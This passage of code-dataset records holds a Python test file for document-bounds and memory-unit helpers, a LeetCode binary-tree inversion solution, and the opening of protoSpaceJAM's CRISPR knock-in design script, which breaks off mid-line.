test_even_bounds_calculation():\n offset, docs = bounds(10, 0, 3)\n assert offset == 0\n assert docs == 3\n offset, docs = bounds(100, 0, 3, ensure_even=True)\n assert offset == 0\n assert docs == 34\n offset, docs = bounds(100, 1, 3, ensure_even=True)\n assert offset == 34\n assert docs == 34\n offset, docs = bounds(100, 2, 3, ensure_even=True)\n assert offset == 68\n assert docs == 32\n\n\ndef test_bounds_more_clients_than_docs():\n offset, docs = bounds(2, 0, 5)\n assert offset == 0\n assert docs == 1\n offset, docs = bounds(2, 1, 5)\n assert offset == 1\n assert docs == 1\n offset, docs = bounds(2, 2, 5)\n assert docs == 0\n offset, docs = bounds(2, 3, 5)\n assert docs == 0\n offset, docs = bounds(2, 4, 5)\n assert docs == 0\n\n\ndef test_convert_to_gib():\n assert convert_to_gib(\"1GB\") == 1.0\n assert convert_to_gib(\"2G\") == 2.0\n assert convert_to_gib(\"1MB\") == 0.0009765625\n assert convert_to_gib(\"1024M\") == 1.0\n assert convert_to_gib(\"1TB\") == 1024\n assert convert_to_gib(\"2T\") == 2048\n assert convert_to_gib(\"1PB\") == 1048576\n assert convert_to_gib(\"2P\") == 2097152\n","repo_name":"elastic/rally-tracks","sub_path":"elastic/tests/utils/utils_test.py","file_name":"utils_test.py","file_ext":"py","file_size_in_byte":4032,"program_lang":"python","lang":"en","doc_type":"code","stars":202,"dataset":"github-code","pt":"3"} +{"seq_id":"24080108705","text":"# 226. Invert Binary Tree\n\n# Given the root of a binary tree, invert the tree, and return its root.\n\n\nclass Solution:\n def invertTree(self, root: Optional[TreeNode]) -> Optional[TreeNode]:\n if not root:\n return None\n stack = [root]\n\n while stack:\n curr = stack.pop()\n \n left = curr.left\n right = curr.right\n curr.left = right\n curr.right = left\n\n if curr.left:\n stack.append(curr.left)\n \n if curr.right:\n stack.append(curr.right)\n\n return root","repo_name":"g-hor/pairing","sub_path":"invertBinaryTree.py","file_name":"invertBinaryTree.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33403285462","text":"import datetime\nimport linecache\nimport logging\nimport os.path\nimport pickle\nimport sys\nimport traceback\nimport time\nimport pandas as pd\n\nfrom protoSpaceJAM.util.utils import MyParser, ColoredLogger, read_pickle_files, cal_elapsed_time, get_gRNAs,get_gRNAs_target_coordinate, \\\n get_HDR_template #uncomment this for pip installation\n\n# from util.utils import MyParser, ColoredLogger, read_pickle_files, cal_elapsed_time, get_gRNAs, get_gRNAs_target_coordinate, \\\n# get_HDR_template\n\ndef parse_args(test_mode=False):\n parser = MyParser(description=\"protoSpaceJAM: perfectionist CRISPR knock-in design at scale\\n\")\n IO = parser.add_argument_group('input/output')\n IO.add_argument(\n \"--path2csv\",\n default=os.path.join(\"input\",\"test_input.csv\"),\n type=str,\n help=\"Path to a csv file containing the input knock-in sites, see input/test_input.csv for an example\\n *required columns*: 'Ensembl_ID' (specifying the transcript ID), and either 'Target_terminus' or 'Chromosome','Coordinate' (specifying the terminus of the transcript or a genomic coordinate in the transcript)\",\n metavar=\"\",\n )\n IO.add_argument(\n \"--outdir\",\n default=os.path.join(\"output\",\"test\"),\n type=str,\n metavar = \"\",\n help=\"Path to the output directory\"\n )\n genome = parser.add_argument_group('genome')\n genome.add_argument(\n \"--genome_ver\",\n default=\"GRCh38\",\n type=str,\n help=\"Genome 
and version to use, possible values are GRCh38, GRCm39, and GRCz11\",\n metavar=\"\",\n )\n gRNA = parser.add_argument_group('gRNA')\n gRNA.add_argument(\n \"--num_gRNA_per_design\",\n default=1,\n type=int,\n help=\"Number of gRNAs to return per site (default: 1)\",\n metavar=\"\",\n )\n gRNA.add_argument(\n \"--no_regulatory_penalty\",\n default=False,\n action=\"store_true\",\n help=\"Turn off penalty for gRNAs cutting in UTRs or near splice junctions, default: penalty on\",\n )\n payload = parser.add_argument_group('payload')\n payload.add_argument(\n \"--payload\",\n default=\"\",\n type=str,\n help=\"Define the payload sequence for every site, regardless of terminus or coordinates, overrides --Npayload, --Cpayload, POSpayload, --Tag, --Linker\",\n metavar=\"\",\n )\n payload.add_argument(\n \"--Npayload\",\n default=\"ACCGAGCTCAACTTCAAGGAGTGGCAAAAGGCCTTTACCGATATGATGGGTGGCGGATTGGAAGTTTTGTTTCAAGGTCCAGGAAGTGGT\",\n type=str,\n help=\"Payload sequence to use at the N terminus (default: mNG11 + XTEN80): ACCGAGCTCAACTTCAAGGAGTGGCAAAAGGCCTTTACCGATATGATGGGTGGCGGATTGGAAGTTTTGTTTCAAGGTCCAGGAAGTGGT, overrides --Tag and --Linker\",\n metavar=\"\",\n )\n payload.add_argument(\n \"--Cpayload\",\n default=\"GGTGGCGGATTGGAAGTTTTGTTTCAAGGTCCAGGAAGTGGTACCGAGCTCAACTTCAAGGAGTGGCAAAAGGCCTTTACCGATATGATG\",\n type=str,\n help=\"Payload sequence to use at the C terminus (default: XTEN80 + mNG11): GGTGGCGGATTGGAAGTTTTGTTTCAAGGTCCAGGAAGTGGTACCGAGCTCAACTTCAAGGAGTGGCAAAAGGCCTTTACCGATATGATG, overrides --Tag and --Linker\",\n metavar=\"\",\n )\n payload.add_argument(\n \"--POSpayload\",\n default=\"GGTGGCGGATTGGAAGTTTTGTTTCAAGGTCCAGGAAGTGGTACCGAGCTCAACTTCAAGGAGTGGCAAAAGGCCTTTACCGATATGATG\",\n type=str,\n help=\"Payload sequence to use at the specific genomic coordinates (default: XTEN80 + mNG11): GGTGGCGGATTGGAAGTTTTGTTTCAAGGTCCAGGAAGTGGTACCGAGCTCAACTTCAAGGAGTGGCAAAAGGCCTTTACCGATATGATG, overrides --Tag and --Linker\",\n metavar=\"\",\n )\n payload.add_argument(\n \"--Tag\",\n default=\"ACCGAGCTCAACTTCAAGGAGTGGCAAAAGGCCTTTACCGATATGATG\",\n type=str,\n help=\"default is the mNG11 tag\",\n metavar=\"\",\n )\n payload.add_argument(\n \"--Linker\",\n default=\"GGTGGCGGATTGGAAGTTTTGTTTCAAGGTCCAGGAAGTGGT\",\n type=str,\n help=\"default is the XTEN80 linker\",\n metavar=\"\",\n )\n\n donor = parser.add_argument_group('donor')\n donor.add_argument(\n \"--Donor_type\",\n default=\"ssODN\",\n help=\"Set the type of donor, possible values are ssODN and dsDNA (default: ssODN)\",\n type=str,\n metavar=\"\",\n )\n donor.add_argument(\n \"--HA_len\",\n default=500,\n help=\"[dsDNA] Length of the desired homology arm on each side (default: 500)\",\n type=int,\n metavar=\"\",\n )\n donor.add_argument(\n \"--Strand_choice\",\n default=\"auto\",\n help=\"[ssODN] Strand choice of ssoODN, Possible values are 'auto', 'TargetStrand', 'NonTargetStrand', 'CodingStrand' and 'NonCodingStrand'\",\n type=str,\n metavar=\"\",\n )\n donor.add_argument(\n \"--ssODN_max_size\",\n type=int,\n default=200,\n help=\"Enforce a length restraint on the the ssODN donor (default: 200), The ssODN donor will be centered on the payload and the recoded region\",\n metavar=\"\",\n )\n donor.add_argument(\n \"--CheckEnzymes\",\n default=\"\",\n help=\"[dsDNA] Name of Restriction digestion enzymes, separated by '|', to flag and trim, for example BsaI|EcoRI (default: None)\",\n type=str,\n metavar=\"\",\n )\n donor.add_argument(\n \"--CustomSeq2Avoid\",\n default=\"\",\n help=\"[dsDNA] Custom sequences, separated by '|', to flag and trim (default: None)\",\n 
type=str,\n metavar=\"\",\n )\n donor.add_argument(\n \"--MinArmLenPostTrim\",\n default=0,\n help=\"[dsDNA] Minimum length of the homology arm after trimming. Set to 0 to turn off trimming (default: 0)\",\n type=int,\n metavar=\"\",\n )\n recoding = parser.add_argument_group('recoding')\n recoding.add_argument(\n \"--recoding_off\",\n default=False,\n action=\"store_true\",\n help=\"Turn off *all* recoding\",\n )\n recoding.add_argument(\n \"--recoding_stop_recut_only\",\n default=False,\n action=\"store_true\",\n help=\"Recode the gRNA recognition site to prevent recut\",\n )\n recoding.add_argument(\n \"--recoding_full\",\n default=False,\n action=\"store_true\",\n help=\"Use full recoding: recode both the gRNA recognition site and the cut-to-insert region (default: on)\",\n )\n recoding.add_argument(\n \"--cfdThres\",\n default=0.03,\n help=\"Threshold that protoSpaceJAM will attempt to lower the recut potential (measured by the CFD score) to (default: 0.03)\",\n metavar=\"\",\n )\n recoding.add_argument(\n \"--recode_order\",\n default=\"PAM_first\",\n help=\"Prioritize recoding in the PAM or in protospacer, possible values: protospacer_first, PAM_first (default: PAM_first)\",\n metavar=\"\",\n )\n misc = parser.add_argument_group('misc.')\n misc.add_argument(\n \"--test_mode\",\n default=False,\n help=\"used by the unit tests, not user-oriented\",\n metavar=\"\",\n )\n config = parser.parse_args()\n return config, parser\n\n\ndef main(custom_args=None):\n \"\"\"\n main function\n custom_args: a dict of arguments to override the default arguments\n \"\"\"\n try:\n #set up working directory\n if not os.path.exists(os.path.join(\"precomputed_gRNAs\")):\n if not os.path.exists(os.path.join(\"protoSpaceJAM\", \"precomputed_gRNAs\")):\n sys.exit(\"precomputed_gRNAs folder not found, please run the script from the repo's root directory\")\n else:\n os.chdir(\"protoSpaceJAM\")\n\n logging.setLoggerClass(ColoredLogger)\n # logging.basicConfig()\n log = logging.getLogger(\"protoSpaceJAM\")\n log.propagate = False\n log.setLevel(logging.INFO) # set the level of warning displayed\n # log.setLevel(logging.DEBUG) #set the level of warning displayed\n\n # configs\n config = vars(parse_args()[0])\n parser = parse_args()[1]\n\n # apply custom args\n if not custom_args is None and len(custom_args) > 0:\n for c_arg in custom_args:\n config[c_arg] = custom_args[c_arg]\n\n # Exit if no arguments provided and not in test mode\n if len(sys.argv)==1 and config[\"test_mode\"] == False:\n print(\"[Message] Pleases provide the following arguments: --path2csv --outdir\")\n print(\"[Message] To run a quick example: protoSpaceJAM --path2csv input/test_input.csv --outdir output/test\\n\")\n\n parser.print_help(sys.stderr)\n sys.exit(1)\n\n gRNA_num_out = config[\"num_gRNA_per_design\"]\n max_cut2ins_dist = 50 # deprecated?\n HDR_arm_len = config[\"HA_len\"]\n ssODN_max_size = config[\"ssODN_max_size\"]\n spec_score_flavor = \"guideMITScore\"\n outdir = config[\"outdir\"]\n reg_penalty = not config[\"no_regulatory_penalty\"]\n syn_check_args = {\n \"check_enzymes\": config[\"CheckEnzymes\"],\n \"CustomSeq2Avoid\": config[\"CustomSeq2Avoid\"],\n \"MinArmLenPostTrim\": config[\"MinArmLenPostTrim\"],\n } # dictionary for multiple synthesis check arguments\n\n # check recoding args\n assert (\n config[\"recode_order\"] == \"protospacer_first\"\n or config[\"recode_order\"] == \"PAM_first\"\n )\n if config[\"recoding_full\"] and any(\n [config[\"recoding_off\"], config[\"recoding_stop_recut_only\"]]\n ):\n sys.exit(\n 
f\"Found conflicts in recoding arguments: --recoding_full cannot be used with --recoding_off or --recoding_stop_recut_only\\nplease correct the issue and try again\"\n )\n if config[\"recoding_off\"] and config[\"recoding_stop_recut_only\"]:\n sys.exit(\n f\"Found conflicts in recoding arguments: --recoding_off cannot be used with --recoding_stop_recut_only\\nplease correct the issue and try again\"\n )\n\n # process recoding args\n if (not config[\"recoding_off\"]) and (not config[\"recoding_stop_recut_only\"]):\n config[\"recoding_full\"] = True\n\n if config[\"recoding_off\"] or config[\"recoding_stop_recut_only\"]:\n config[\"recoding_full\"] = False\n\n recoding_args = {\n \"recoding_off\": config[\"recoding_off\"],\n \"recoding_stop_recut_only\": config[\"recoding_stop_recut_only\"],\n \"recoding_full\": config[\"recoding_full\"],\n \"cfdThres\": float(config[\"cfdThres\"]),\n \"recode_order\": config[\"recode_order\"],\n }\n\n # check donor args\n if not config[\"Donor_type\"] in [\"ssODN\", \"dsDNA\"]:\n sys.exit(\n \"Donor_type must be ssODN or dsDNA, offending value:\"\n + config[\"Donor_type\"]\n + \", please correct the issue and try again\"\n )\n if not config[\"Strand_choice\"] in [\n \"auto\",\n \"TargetStrand\",\n \"NonTargetStrand\",\n \"CodingStrand\",\n \"NonCodingStrand\",\n ]:\n sys.exit(\n \"Strand_choice must be auto,TargetStrand,NonTargetStrand,CodingStrand or NonCodingStrand, offending value:\"\n + config[\"Strand_choice\"]\n + \", please correct the issue and try again\"\n )\n\n # parse payload\n Linker = config[\"Linker\"]\n Tag = config[\"Tag\"]\n\n if config[\"payload\"] == \"\": # no payload override\n if config[\"Npayload\"] == \"\": # no Npayload override\n config[\"Npayload\"] = Tag + Linker\n if config[\"Cpayload\"] == \"\": # no Cpayload override\n config[\"Cpayload\"] = Linker + Tag\n else: # payload override\n config[\"Npayload\"] = config[\"payload\"]\n config[\"Cpayload\"] = config[\"payload\"]\n config[\"POSpayload\"] = config[\"payload\"]\n\n\n # check if HA_len is too short to satisfy ssODN_max_size\n if ssODN_max_size is not None:\n max_payload_size = max([len(config[\"Npayload\"]), len(config[\"Cpayload\"])])\n derived_HDR_arm_len = ssODN_max_size - max_payload_size / 2\n if derived_HDR_arm_len >= HDR_arm_len:\n print(\n f\"HA_len={HDR_arm_len} is to short to meet the requirement of ssODN_max_size={ssODN_max_size}, payload size={max_payload_size}\\n ssODN_max_size={ssODN_max_size} requires HA_len = ssODN_max_size- max_payload_size / 2 = {derived_HDR_arm_len}\"\n )\n HDR_arm_len = derived_HDR_arm_len + 100\n print(f\"HA_len is adjusted to {HDR_arm_len}\")\n\n # TODO: fix the potential infinite loop\n # check memory requirement\n enough_mem = test_memory(4200)\n while not enough_mem: # test if at least 4.2 GB memory is available\n time.sleep(5) # retry in 5 seconds\n enough_mem = test_memory(4200)\n\n starttime = datetime.datetime.now()\n freq_dict = dict()\n\n # load gRNA info index (mapping of chromosomal location to file parts)\n log.info(\"loading precomputed gRNA **index to file parts**\")\n loc2file_index = read_pickle_files(\n os.path.join(\n \"precomputed_gRNAs\",\n \"gRNA_\" + config[\"genome_ver\"],\n \"gRNA.tab.gz.split.BwaMapped.scored\",\n \"loc2file_index.pickle\",\n )\n )\n\n elapsed = cal_elapsed_time(starttime, datetime.datetime.now())\n log.info(f\"finished loading in {elapsed[0]:.2f} min ({elapsed[1]} sec)\")\n\n # load chr location to type (e.g. 
UTR, cds, exon/intron junction) mappings\n log.info(\n \"loading the mapping of chromosomal location to type (e.g. UTR, cds, exon/intron junction)\"\n )\n loc2posType = read_pickle_files(\n os.path.join(\n \"genome_files\",\n \"parsed_gff3\",\n config[\"genome_ver\"],\n \"loc2posType.pickle\",\n )\n )\n\n elapsed = cal_elapsed_time(starttime, datetime.datetime.now())\n log.info(f\"finished loading in {elapsed[0]:.2f} min ({elapsed[1]} sec)\")\n\n # load gene model info\n # log.info(\"loading gene model info\")\n # ENST_info = read_pickle_files(os.path.join(\"genome_files\",\"parsed_gff3\", config['genome_ver'],\"ENST_info.pickle\"))\n\n # load the mapping of ENST to the info file part\n log.info(\"loading gene model info **index to file parts**\")\n ENST_info_index = read_pickle_files(\n os.path.join(\n \"genome_files\",\n \"parsed_gff3\",\n config[\"genome_ver\"],\n \"ENST_info\",\n \"ENST_info_index.pickle\",\n )\n )\n\n elapsed = cal_elapsed_time(starttime, datetime.datetime.now())\n log.info(f\"finished loading in {elapsed[0]:.2f} min ({elapsed[1]} sec)\")\n\n # load codon phase index\n # log.info(\"loading codon phase info\")\n # ENST_PhaseInCodon = read_pickle_files(os.path.join(\"genome_files\",\"parsed_gff3\", config['genome_ver'],\"ENST_codonPhase.pickle\"))\n\n log.info(\"loading codon phase info **index to file parts**\")\n ENST_PhaseInCodon_index = read_pickle_files(\n os.path.join(\n \"genome_files\",\n \"parsed_gff3\",\n config[\"genome_ver\"],\n \"ENST_codonPhases\",\n \"ENST_codonPhase_index.pickle\",\n )\n )\n\n # report time used\n elapsed = cal_elapsed_time(starttime, datetime.datetime.now())\n log.info(f\"finished loading in {elapsed[0]:.2f} min ({elapsed[1]} sec)\")\n\n # report the number of ENSTs which has ATG at the end of the exon\n # ExonEnd_ATG_count,ExonEnd_ATG_list = count_ATG_at_exonEnd(ENST_info)\n\n # open log files\n mkdir(outdir)\n recut_CFD_all = open(os.path.join(outdir, \"recut_CFD_all.txt\"), \"w\")\n recut_CFD_fail = open(os.path.join(outdir, \"recut_CFD_fail.txt\"), \"w\")\n csvout_N = open(os.path.join(outdir, \"out_Nterm_recut_cfd.csv\"), \"w\")\n csvout_C = open(os.path.join(outdir, \"out_Cterm_recut_cfd.csv\"), \"w\")\n csvout_header = \"ID,cfd1,cfd2,cfd3,cfd4,cfdScan,cfdScanNoRecode,cfd_max\\n\"\n csvout_N.write(csvout_header)\n csvout_C.write(csvout_header)\n fiveUTR_log = open(os.path.join(outdir, \"fiveUTR.txt\"), \"w\")\n\n # open result file and write header\n csvout_res = open(f\"{outdir}/result.csv\", \"w\")\n csvout_res.write(\n f\"Entry,ID,chr,transcript_type,name,terminus,gRNA_name,gRNA_seq,PAM,gRNA_start,gRNA_end,gRNA_cut_pos,edit_pos,distance_between_cut_and_edit(cut_pos-insert_pos),specificity_score,specificity_weight,distance_weight,position_weight,final_weight,cfd_before_recoding,cfd_after_recoding,cfd_after_windowScan_and_recoding,max_recut_cfd,name_of_DNA_donor,DNA donor,name_of_trimmed_DNA_Donor,trimmed_DNA_donor,effective_HA_len,synthesis_problems,cutPos2nearestOffLimitJunc,strand(gene/gRNA/donor)\\n\"\n ) #\"Entry,ID,chr,transcript_type,name,terminus,gRNA_seq,PAM,gRNA_start,gRNA_end,gRNA_cut_pos,edit_pos,distance_between_cut_and_edit(cut pos - insert pos),specificity_score,specificity_weight,distance_weight,position_weight,final_weight,cfd_before_recoding,cfd_after_recoding,cfd_after_windowScan_and_recoding,max_recut_cfd,DNA donor,effective_HA_len,synthesis_problems,cutPos2nearestOffLimitJunc,strand(gene/gRNA/donor)\\n\"\n\n # open result file2 for GenoPrimer input\n csvout_res2 = open(f\"{outdir}/input_for_GenoPrimer.csv\", 
\"w\")\n csvout_res2.write(f\"Entry,ref,chr,coordinate,ID,geneSymbol\\n\")\n\n # dataframes to store best gRNAs\n best_start_gRNAs = pd.DataFrame()\n best_stop_gRNAs = pd.DataFrame()\n\n # logging cfd score, failed gRNAs etc\n start_info = info()\n stop_info = info()\n\n # load ENST list (the user input list or the whole transcriptome)\n if os.path.isfile(config[\"path2csv\"]):\n log.info(\n f\"begin processing user-supplied list of gene IDs in file {config['path2csv']}\"\n )\n df = pd.read_csv(os.path.join(config[\"path2csv\"]), dtype = str)\n # check csv columns\n keys2check = set([\"Ensembl_ID\"])\n if not keys2check.issubset(df.columns):\n log.error(\n f'Missing columns in the input csv file\\n Required columns:\"Ensembl_ID\"'\n )\n log.info(f\"Please fix the input csv file and try again\")\n sys.exit()\n else:\n sys.exit(f\"ERROR: The input file {config['path2csv']} is not found\")\n # log.warning(f\"The input file {config['path2csv']} is not found, using the whole human transcriptome\")\n # input(\"Press Enter to continue...\")\n # df = pd.DataFrame(ENST_info.keys(), columns = [\"Ensembl_ID\"]) # create data frame from ENST_info\n\n # loop through each entry in the input csv file\n transcript_count = 0\n protein_coding_transcripts_count = 0\n target_terminus = \"None\"\n target_coordinate = \"None\"\n ENST_in_db = False\n ENST_design_counts = {} #used in the names of gRNA and donors\n Entry = 0 # Entry is defined by the portal, and if not using the portal, it is just the index of the row\n for index, row in df.iterrows():\n ENST_ID = row[\"Ensembl_ID\"].rstrip().lstrip()\n if \"Target_terminus\" in df.columns and row.isnull()[\"Target_terminus\"] == False:\n target_terminus = row[\"Target_terminus\"].rstrip().lstrip().upper()\n\n if (\n target_terminus != \"N\"\n and target_terminus != \"C\"\n and target_terminus != \"ALL\"\n and target_terminus != \"\"\n ):\n sys.exit(f\"invalid target terminus: {target_terminus}\")\n\n # determine if the input is ENST-based or coordinate-based\n ENST_based, coordinate_based = False, False\n if \"Chromosome\" in df.columns and \"Coordinate\" in df.columns and row.isnull()[\"Chromosome\"] == False and row.isnull()[\"Coordinate\"] == False:\n chrom = str(row[\"Chromosome\"]).rstrip().lstrip()\n coordinate = str(row[\"Coordinate\"]).rstrip().lstrip()\n if (\n chrom != \"\"\n and coordinate != \"\"\n and coordinate.isdigit()\n ):\n coordinate_based = True\n # if coordinate_based didn't check out, revert to ENST-based\n if coordinate_based == False:\n ENST_based = True\n if not target_terminus in [\"N\",\"C\",\"ALL\"]:\n target_terminus = \"ALL\"\n\n if \"Entry\" in df.columns:\n try:\n Entry = str(row[\"Entry\"]).rstrip().lstrip()\n ENST_in_db = True\n except:\n ENST_in_db = False\n\n # check if ENST_ID is in the database\n if not ENST_ID in ENST_info_index.keys():\n if not ENST_in_db:\n Entry += 1\n log.warning(\n f\"skipping {ENST_ID} b/c transcript is not in the annotated ENST collection (excluding those on chr_patch_hapl_scaff)\"\n )\n genome_ver = config[\"genome_ver\"]\n csvout_res.write(\n f\"{Entry},{ENST_ID},ERROR: this ID was not found in the genome {genome_ver}, most likely this ID was deprecated\\n\"\n )\n continue\n\n # check if codon phase info exists\n if not ENST_ID in ENST_PhaseInCodon_index.keys():\n if not ENST_in_db:\n Entry += 1\n log.warning(\n f\"skipping {ENST_ID} b/c transcript has no codon phase information\"\n )\n csvout_res.write(\n f\"{Entry},{ENST_ID},ERROR: this ID is either not protein-coding and/or has no codon phase 
information\\n\"\n )\n continue\n\n # load the ENST_info for current ID\n part = ENST_info_index[ENST_ID]\n ENST_info = read_pickle_files(\n os.path.join(\n \"genome_files\",\n \"parsed_gff3\",\n config[\"genome_ver\"],\n \"ENST_info\",\n f\"ENST_info_part{part}.pickle\",\n )\n )\n\n transcript_type = ENST_info[ENST_ID].description.split(\"|\")[1]\n # if transcript_type == \"protein_coding\": # and ENST_ID == \"ENST00000398165\":\n # if not ENST_ID in ExonEnd_ATG_list: # only process edge cases in which genes with ATG are at the end of exons\n # continue\n log.info(f\"processing {ENST_ID}\\ttranscript type: {transcript_type}\")\n\n if hasattr(ENST_info[ENST_ID], \"name\"):\n name = ENST_info[ENST_ID].name\n else:\n name = \"\"\n row_prefix = f\"{ENST_ID},{ENST_info[ENST_ID].chr},{transcript_type},{name}\"\n\n # get codon_phase information for current ENST\n file_parts_list = ENST_PhaseInCodon_index[ENST_ID]\n ENST_PhaseInCodon = {}\n for part in file_parts_list:\n Codon_phase_dict = read_pickle_files(\n os.path.join(\n \"genome_files\",\n \"parsed_gff3\",\n config[\"genome_ver\"],\n \"ENST_codonPhases\",\n f\"ENST_codonPhase_part{str(part)}.pickle\",\n )\n )\n ENST_PhaseInCodon = deepmerge(\n ENST_PhaseInCodon, Codon_phase_dict\n ) # merge file parts if ENST codon info is split among fileparts\n\n ######################################\n # best gRNA for a specific coordinate#\n ######################################\n if coordinate_based == True:\n if not ENST_in_db:\n Entry += 1\n csvout_N.write(ENST_ID)\n #check if the coordinate is in the ENST\n if ENST_info[ENST_ID].chr == chrom and min(ENST_info[ENST_ID].span_start, ENST_info[ENST_ID].span_end) <= int(coordinate) <= max(ENST_info[ENST_ID].span_start, ENST_info[ENST_ID].span_end):\n \n # get gRNAs\n ranked_df_gRNAs_target_pos = get_gRNAs_target_coordinate(\n ENST_ID=ENST_ID,\n chrom = chrom,\n pos = int(coordinate),\n ENST_info=ENST_info,\n freq_dict=freq_dict,\n loc2file_index=loc2file_index,\n loc2posType=loc2posType,\n dist=max_cut2ins_dist,\n genome_ver=config[\"genome_ver\"],\n spec_score_flavor=spec_score_flavor,\n reg_penalty=reg_penalty,\n )\n\n if ranked_df_gRNAs_target_pos.empty == True:\n csvout_res.write(f\"{Entry},{ENST_ID},ERROR: no suitable gRNAs found\\n\")\n\n for i in range(0, min([gRNA_num_out, ranked_df_gRNAs_target_pos.shape[0]])):\n current_gRNA = ranked_df_gRNAs_target_pos.iloc[[i]]\n\n # get HDR template\n try:\n HDR_template = get_HDR_template(\n df=current_gRNA,\n ENST_info=ENST_info,\n type=\"start\", # this borrowed option specifies that the edit is immediately after the coordinate\n ENST_PhaseInCodon=ENST_PhaseInCodon,\n loc2posType=loc2posType,\n genome_ver=config[\"genome_ver\"],\n HDR_arm_len=HDR_arm_len,\n tag=config[\"POSpayload\"],\n ssODN_max_size=ssODN_max_size,\n Donor_type=config[\"Donor_type\"],\n Strand_choice=config[\"Strand_choice\"],\n recoding_args=recoding_args,\n syn_check_args=syn_check_args,\n )\n except Exception as e:\n print(\"Unexpected error:\", str(sys.exc_info()))\n traceback.print_exc()\n print(\"additional information:\", e)\n PrintException()\n\n # append the best gRNA to the final df\n if i == 0:\n best_start_gRNAs = pd.concat([best_start_gRNAs, current_gRNA])\n\n # append cfd score to list for plotting\n pre_recoding_cfd_score = HDR_template.pre_recoding_cfd_score\n cfd1 = \"\"\n if hasattr(HDR_template, \"cfd_score_post_mut_ins\"):\n cfd1 = HDR_template.cfd_score_post_mut_ins\n if not hasattr(HDR_template, \"cfd_score_post_mut2\"):\n cfd2 = cfd1\n else:\n cfd2 = 
HDR_template.cfd_score_post_mut2\n if not hasattr(HDR_template, \"cfd_score_post_mut3\"):\n cfd3 = cfd2\n else:\n cfd3 = HDR_template.cfd_score_post_mut3\n if not hasattr(HDR_template, \"cfd_score_post_mut4\"):\n cfd4 = cfd3\n else:\n cfd4 = HDR_template.cfd_score_post_mut4\n cfd_scan = 0\n cfd_scan_no_recode = 0\n if hasattr(HDR_template, \"cfd_score_highest_in_win_scan\"):\n cfd_scan = HDR_template.cfd_score_highest_in_win_scan\n cfd_scan_no_recode = HDR_template.scan_highest_cfd_no_recode\n\n cfdfinal = HDR_template.final_cfd\n\n strands = f\"{HDR_template.ENST_strand}/{HDR_template.gStrand}/{HDR_template.Donor_strand}\"\n\n # write csv\n (\n spec_score,\n seq,\n pam,\n s,\n e,\n cut2ins_dist,\n spec_weight,\n dist_weight,\n pos_weight,\n final_weight,\n ) = get_res(current_gRNA, spec_score_flavor)\n donor = HDR_template.Donor_final\n donor_trimmed = \"N/A for ssODN\"\n if config[\"Donor_type\"] == \"dsDNA\":\n donor_trimmed = HDR_template.Donor_final\n donor = HDR_template.Donor_pretrim\n \n # gRNA and donor names\n ENST_design_counts[ENST_ID] = ENST_design_counts.get(ENST_ID, 0) + 1\n gRNA_name = f\"{ENST_ID}_gRNA_{ENST_design_counts[ENST_ID]}\"\n donor_name = f\"{ENST_ID}_donor_{ENST_design_counts[ENST_ID]}\"\n if config[\"Donor_type\"] == \"dsDNA\":\n donor_trimmed_name = f\"{ENST_ID}_donor_trimmed_{ENST_design_counts[ENST_ID]}\"\n else:\n donor_trimmed_name = \"N/A for ssODN\"\n\n gRNA_cut_pos = (\n HDR_template.CutPos\n ) # InsPos is the first letter of stop codon \"T\"AA or the last letter of the start codon AT\"G\"\n insert_pos = HDR_template.InsPos\n if config[\"recoding_off\"]:\n csvout_res.write(\n f\"{Entry},{row_prefix},-,{gRNA_name},{seq},{pam},{s},{e},{gRNA_cut_pos},{insert_pos},{cut2ins_dist},{spec_score},{ret_six_dec(spec_weight)},{ret_six_dec(dist_weight)},{ret_six_dec(pos_weight)},{ret_six_dec(final_weight)},{ret_six_dec(pre_recoding_cfd_score)},recoding turned off,,{ret_six_dec(cfdfinal)},{donor_name},{donor},{donor_trimmed_name},{donor_trimmed},{HDR_template.effective_HA_len},{HDR_template.synFlags},{HDR_template.cutPos2nearestOffLimitJunc},{strands}\\n\"\n )\n csvout_res2.write( f\"{Entry},\"+\n config[\"genome_ver\"]\n + f\",{HDR_template.ENST_chr},{insert_pos},{ENST_ID},{name}\\n\"\n )\n else:\n if not isinstance(cfd4, float):\n cfd4 = \"\"\n csvout_res.write(\n f\"{Entry},{row_prefix},-,{gRNA_name},{seq},{pam},{s},{e},{gRNA_cut_pos},{insert_pos},{cut2ins_dist},{spec_score},{ret_six_dec(spec_weight)},{ret_six_dec(dist_weight)},{ret_six_dec(pos_weight)},{ret_six_dec(final_weight)},{ret_six_dec(pre_recoding_cfd_score)},{ret_six_dec(cfd4)},{ret_six_dec(cfd_scan)},{ret_six_dec(cfdfinal)},{donor_name},{donor},{donor_trimmed_name},{donor_trimmed},{HDR_template.effective_HA_len},{HDR_template.synFlags},{HDR_template.cutPos2nearestOffLimitJunc},{strands}\\n\"\n )\n csvout_res2.write( f\"{Entry},\"+\n config[\"genome_ver\"]\n + f\",{HDR_template.ENST_chr},{insert_pos},{ENST_ID},{name}\\n\"\n )\n\n # write log\n this_log = f\"{HDR_template.info}{HDR_template.info_arm}{HDR_template.info_p1}{HDR_template.info_p2}{HDR_template.info_p3}{HDR_template.info_p4}{HDR_template.info_p5}{HDR_template.info_p6}\\n--------------------final CFD:{ret_six_dec(HDR_template.final_cfd)}\\n donor before any recoding:{HDR_template.Donor_vanillia}\\n donor after all recoding:{HDR_template.Donor_postMut}\\ndonor centered(if applicable):{HDR_template.Donor_final}\\n donor (best strand):{HDR_template.Donor_final}\\n\\n\"\n recut_CFD_all.write(this_log)\n if HDR_template.final_cfd > 0.03:\n 
